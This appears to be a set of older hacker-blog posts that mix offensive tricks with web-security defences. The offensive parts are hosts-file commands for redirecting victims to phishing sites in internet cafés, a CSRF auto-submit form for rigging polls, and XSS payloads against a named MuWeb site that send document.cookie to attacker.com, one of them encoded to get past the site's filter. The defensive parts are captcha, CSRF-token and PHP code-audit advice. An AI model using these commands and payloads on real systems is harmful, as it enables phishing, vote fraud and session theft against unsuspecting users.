Insane Security

Maybe this is something already used (no wondering about it), but it’s worth mentioning…

Real life fishing never has been my favorite activity, not even in my top100 activities, and as imagined phishing neither… I simply hate planting baits and waiting for someone to fall in my net; and I do see phishing as real life fishing, it’s all about practice/patience/technique, of which I can say that I posses only the last one; however I bough a new type of bait…

Yeah I’m not speaking of any new phishing method, or how to hide your fake copy website’s domain; I’m actualy re-domaining it (new words in here) by manipulating the hosts file (nothing fancy)…

Next time you’re going phishing remember to take with you the new bait… and why not plant it in iCafe’s for more fish to be catched… How should you use it without complicating stuff? by using the following commands:

—
echo # >> %WinDir%\system32\drivers\etc\hosts
echo malIP dom.spoof >> %WinDir%\system32\drivers\etc\hosts
—

The # insertion is needed for a new line, the rest you can deduce what it has to be, also if you want to have it on one line (more compressed) and more insertable in shellcode’s then have the following form:

—
cd %WinDir%\system32\drivers\etc\ && echo # >> hosts && echo malIP dom.spoof >> hosts
—

If you catch big fish with this, I don’t mind sharing it… you know, I am usualy hungry… especialy if you catch a CatFish…

And no it’s not a better solution than Akismet, but will do against spam bots…

This is for the ones that host blogs/create a blog and don’t have a spam protection module at it. Maybe you’ve seen this type of protection before (and sure you have; ex: www.darknet.org.uk). Have you guessed it by now? Yes, it’s the “number adding protection”, when you have a last field in a comment form where you have to add 2 numbers (could be even 1mil if wanted, but than who would post comments?).

The most simple method is the following
—
<?php
$n1 = rand(0,20);
$n2 = rand(0,20);
$sum = $n1 + $n2;
echo(”<input type=\”hidden\” name=\”sum\” value=\”$sum\”/>”);
echo(”<input type=\”text\” name=\”add\” value=\”\”/> result $n1 + $n2?”);
?>
—
And on the form parsing page
—
<?php
$sum = $_REQUEST["sum"];
$add = $_REQUEST["add"];
if($sum==$add) {
    //parse the form submited
}
else {
    header(”Location: http://somewebsite.com”); //redirect (if follows)
    //to a not so prefered blog (the bot)
}
?>
—
This would be one way to do it, and the lass good, because the bot could be taught to retrieve the value of the sum field, and the whole protection would be of no use. The next method is based on the same tehnique, only that it uses javascript (there are cases when users have deactivated javascript, or by example use NoScript). No php required in this case…
—
<html>
<head>
<script type=”text/javascript”>
n1 = Math.round(Math.random()*20);
n2 = Math.round(Math.random()*20);
sum = n1 + n2;
document.getElementById(”sum”).innerHTML=”result “+n1+” + “+n2+” ?”;
function formSubmit() {
    if(document.forms[0][0].value==sum) {
        document.forms[0].submit();
    }
    else { alert(”Lack of math skills!”); }
}
</script>
</head>
<body>
<form action=”somepage.php” onsubmit=”formSubmit()”>
<input type=”text” name=”add” value=”"><div id=”sum”></div>
<input type=”submit” value=”submit”>
</body>
</html>
—

E(n)D
Of course as always, you can mix them, or even use this method for displaying your emails(only the second one) because those damn bots can’t parse javascript code… anyway feel free to thrown in some interesting ideas, creative ways to stop spam via html/javascript/php code…

Yes… those where the times…

I don’t know how many of you where in the mailbombing scene (shouldn’t even name it scene)… but there where groups of people who formed small comunities (let’s call them this way) of mailbombers.

And it was easy to mailbomb… what times… nowadays true mailbombing doesn’t exist…
What do I call a true mailbombing? An attack that could render useless your email address…

How could this happen? We can only make some asumptions, because in a different days than nowadays when webmail services (such as Yahoo) had to process many emails at once, they pushed hard and processed them; as of nowadays (I assume) they que emails if they come at a high rate (at least gmail does). Another reason why this could happen (refering to the old yahoo also) was because the limit of 6mb per email address (nowadays being virtualy limitless)…

And a small theory: We (as I and some other folks that used to mailbomb) used to assume that the Yahoo! webmailed service worked in such a way that if a specific email address would have surpased it’s 6mb limitation than that email would no longer be used… It’s just a theory, nowbody proved it, but it seemed to work…

Those where the times… when you used apps like HakTek, Avalanche (other programs existet)… or if you used Linux simple mail scripts…

A myth or a legend… nobody knows…

Take a look on how nowadays mailbombing works… sweet but not as effective…e-mail bombing in informationleak way/

Some time ago when I posted I Love CSRF (XSRF) fazed invited me to do a presentation on CSRF attack and protection… but since then haven’t heard from it… Anyway I wrote down my presentation and since haven’t been asked to do it recently I thought I’ll write it on my blog…

What will I trim out from my presentation? The CSRF attack methods and leave only the defense methods…

Expiring Cookies/Sessions

If you are using cookies to keep your users logged in on your website then you should give your cookies a faster expiration date, than to keep them living until the browser is closed. Let’s put up as an example the following cookie has been set up

—
setCookie(”auth”, md5(md5($password)), time()+600);
—

This would keep the cookie available for 10 minutes, after which it would expire. But that is not enough, you should put the cookie setting line in every page of your website, so that on every page accessing the cookie will get another 10 minutes of life. Kinda rudimentary but what else can you do if you use cookies?

Expiring sessions are sometimes not controllable by you, only if you host your own website; else not much you can do…

Referer Check

Most of the time you will count on the referer to check if the request came from the desired page, a simple implementation would be the following

—
if($_SERVER["HTTP_REFERER"]!=”http://mywebsite.com/desired.php”) {
    //possible csrf
}
—

As with other variables not controllable by the website, there can be people who deactivate the
referer field so that is not passed to the websites they visit.

Tokens

This may seem one of the favorite weapons against CSRF, and of course it is as easy to implement as the ones before mentioned. Firstly let’s assume that on login the token has been set the following way

—
$_SESSION["token"]=rand();
—

This would be useful when we generate a form

—
<form name=”form” action=”processing.php” method=”post”>
<input type=”hidden” name=”token” value=”<?php md5($_SESSION["token"]); ?>”>
<…>
</form>
—

And now the first thing that we should do on the processing.php page, is to check the token

—
$token = $_POST["token"];

if($token!=md5($_SESSION["token"])) {
    //now this is csrf
    die(”….CSRF!”);
}
—

What next?

You only have to choose a way to protect against CSRF… I would recommend mixing the last to, and set some kind of flags to it… it the referer isn’t ok set a possible CSRF flag; and if the token doesn’t match than flag it as CSRF… But what do I know I only wrote it for a presentation…

*UPDATE*

Server Side Protection

Found this after I finished the article; so if you want some server side CSRF protection check this out -> http://0×000000.com/index.php?i=484

This is going to be a quick how-to audit source code under a windows environment without having installed egrep/sed.

Let’s start with the most basic code auditing line:
—
type file.ext | find /i “string”
—
While this won’t do much, the following batch script that I use from time to time, could be helpful, at least for php code auditing (you may modify it to fit your needs a.k.a. C/C++/C#/ASP/JSP/etc):
—
@echo off
echo Auditing %1
type %1 | find /i “$_GET” | more
type %1 | find /i “$_POST” | more
type %1 | find /i “$_REQUEST” | more
type %1 | find /i “include(” | more
@echo on
—
For more lines to add to it check this. Having to disappoint you, because I am going to present you a script far better than the above batch file.

Here it comes -> Skavenger
Skavenger is a source code auditing tool, written in PHP and designed for regular expression usage; so it can be more versatile than the above script. Not much to say about it, the most simple thing for you to do is download it and fool around with it. For download go to http://code.google.com/p/skavenger/downloads/list.

And if you want to continue the project, and make a better console source code auditing tool, then drop me a line at backbone46 [at] gmail (dot) com…

What source code audit is?
It’s a primary technique by which someone can find vulnerabilities of the website, just by inspecting the code.

Consider the following scenarios:

• find a ftp service exploit and you can download the entire website in it’s unparsed form
• have the source of the web application used by the website

What has to be done?
Instead of emulating the real website (setting up a webserver, database, etc) you can just start and analyze the code for common known vulnerable code.

User input
Most of the time user input is passed to the web application via requests, like:
—
$_GET
$_POST
$_REQUEST
$HTTP_POST_VARS
$HTTP_GET_VARS
—
And if register globals in php.ini are activated, user input can be retrieved via <input> names, for example the following html form:
—
<form name=”basic” method=”post” action=”">
<input type=”text” name=”myname”>
<input type=”text” name=”age”>
<input type=”submit” value=”age & name”<
</form>
—
…would create and set the following variables:
—
$myname=”user input”;
$age=”user input”
—
This request should be always searched for input validation, or xss/sql injection possibility.

Internal inclusion
As imagined I’m talking about file inclusion which could lead to lfi/rfi; the php functions that need to be exploited for a lfi/rfi attack are:
—
include()
include_once()
require()
require_once()
virtual()
readfile()
—
Not much to check here, only the parameters origins, validation…

Indirect User Input
Indirect user input? That sounds wierd, but don’t get confused about it; I’m speaking about user-agent information, http referer, cookie reading/writing/printing, session?. The all together could lead to xss/sql injection/http response splitting and why not (remote) code execution/file inclusion. Things to look for:
—
$_SERVER["REFERER"];
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["REQUEST_URI"]
$_COOKIE
$_SESSION
—
Also here a non used Referer would mean CSRF ways of exploitation, keep that in mind; might come handy!

Redirections
Maybe you are not aware of this but after each header redirection there should be a script termination like exit() die(), so the following code would be vulnerable:
—
if($password!=$pass) { header(”Location: noadmin.php”); }
—
Because if the page would be requested via a telnet connection (for example) which wouldn’t understand header information, would skip the redirection phase and see the rest of the page.

Remote code execution
We already mentioned about remote code execution, but it would be better to also note the functions which should be look upon for code execution:
—
exec()
passthru()
proc_open()
shell_exec()
system()
—

The rest, the ugly, the not so common
Besides of the above mentioned vulnerabilities, which are more common, you could also check image upload scripts for proper type/extension validation, and every other shit that I can’t think of….

Go and analyze source code
I pointed out everything that you need to know before auditing PHP code, but if you think I missed something out, don’t bother thinking about it, just drop me a comment…

PING?PONG!

What?
NetBios hacking…

People screaming: lame dude lame, this stuff is older than my grandma!!!

Stop laughing, screaming, swearing and all that shit… Everybody, I suppose, know what is about all the netbios hacking stuff, right?
If not check out a massive tutorial on this subject at Darknet; btw: grab some cigarettes and some beer because netbios most of the time will be frustrating because it won’t work due to different types of windows configuration… but that is another story!

This article ain’t about how to use shares, ipc$ or any other shit contained in netbios hacking, it’s about a tool that can perform all that netbios stuff for you and create a decent output file… by the time you are reading this line I suppose you know that the tool is called WinFingerprint.

Things that WinFingerprint can do:

And the entire package comes wrapped up with a GUI for the non-command line junkies….
Did I mention It’s not new technology? winfingerprint on packetstorm

I really do love CSRF?…. and it all started back when I was reading a topic on w4ck1ng forum, don’t remember the link but gonna tell you in small words. There was this guy who wanted to know if there could be a way to win a poll without constantly changing proxy. First thing that came to my mind was csrf. Why do the dirty job and manually vote 24/7 so that you can win; when you can create a html page with contains the form with auto-submit and incorporate it in a iframe on a website?

How does the html of such a poll look?

—

<html>
<body onload=”document.poll.submit()”>
<form name=”poll” action=”website.dom/pollvote.php” method=”post”>
<input type=”hidden” value=”3″> //the poll option
</form>
</body>
</html>

—

This is just an example, for more csrf fun check the CSRF Database

This is basically an idea that came to me a while ago while got over a XSS vulnerable website, on which I could get hold of the cookie which stored the session identifier…

But firstly, how can a session hijacking take place? Examples based on XSS:

1.The SID is appended in the url, then a simple document.location would help….
2.The SID is stored in the cookie, then what?… document.cookie :-?

But this is not a tutorial about session hijacking, for more info wikipedia or google.

How was I thinking to strengthen the website against SH?
The magic answer: to store an IP per session, so that only the IP that registered the session can take full advantage of it….

Implementation? To easy to print out the code (maybe in a later article).

What would not help? A visitor who has dynamic IP, or an attacker on the same sub network as the victim….

Of course this is just a strengthening technique, you always should secure your website in many ways as possible. I don’t see how a add-on could disadvantage you…

Very often when got nothing to do, I put my thoughts on how to better secure a website/server (it depends). And by accident last week I came upon a XSS vulnerability across a MU server on which I am a co-administrator…

What version of Mutoolz? Don’t know but if you’re eager to find out browse the web, or simply ask google… Ok it’s not Mutoolz based, it’s called MuWeb; some custom developed Mu Web Interface by a guy who doesn’t give a damn about security…..

Anyway this MuWeb, which has the most sickly written code [it takes you a good period of time to modify it] could be exploited in the following way:

—

http://muwebsite.com/index.php?op=<script>alert(/xss/)</script>

—

Yes, it doesn’t use good filters, just some type of filter based on regular expressions… as I used to say: if you ain’t good at regex, DON’T use them… anyway it filters out double-simple quotes; and what? It’s still vulnerable to XSS, but it won’t work the classical cookie stealing method:

—

http://muwebsite.com/index.php?op=<script>document.location=
‘http://attacker.com/steal.php?C=’+document.cookie</script>

—

But we can bypass this filter, can’t we?

—

http://muwebsite.com/index.php?op=<script>document.location=unescape(
%27%68%74%74%70%3A%2F%2F%61%74%74%61%63%6B%65%72
%2E%63%6F%6D%2F%73%74%65%61%6C%2E%70%68%70%3F%43
%3D%27)+document.cookie</script>

—

Or by using the String.fromCharCode() method, it’s up to the attacker to decide…

My question is… How can someone develop components for a Mu Server if it’s making a vulnerable one at the top layer (web app layer)? Who does test this components? Why don’t they test them accurately ?

P.S. Funny thing, after I discovered this XSS vulnerability, I thought I’d find others two with Acunetix… guess what Acunetix didn’t even find the XSS vulnerability :-?

P.P.S No it’s not the regular MuWeb, it’s one combined with Php-Nuke -> http://softshare.uv.ro/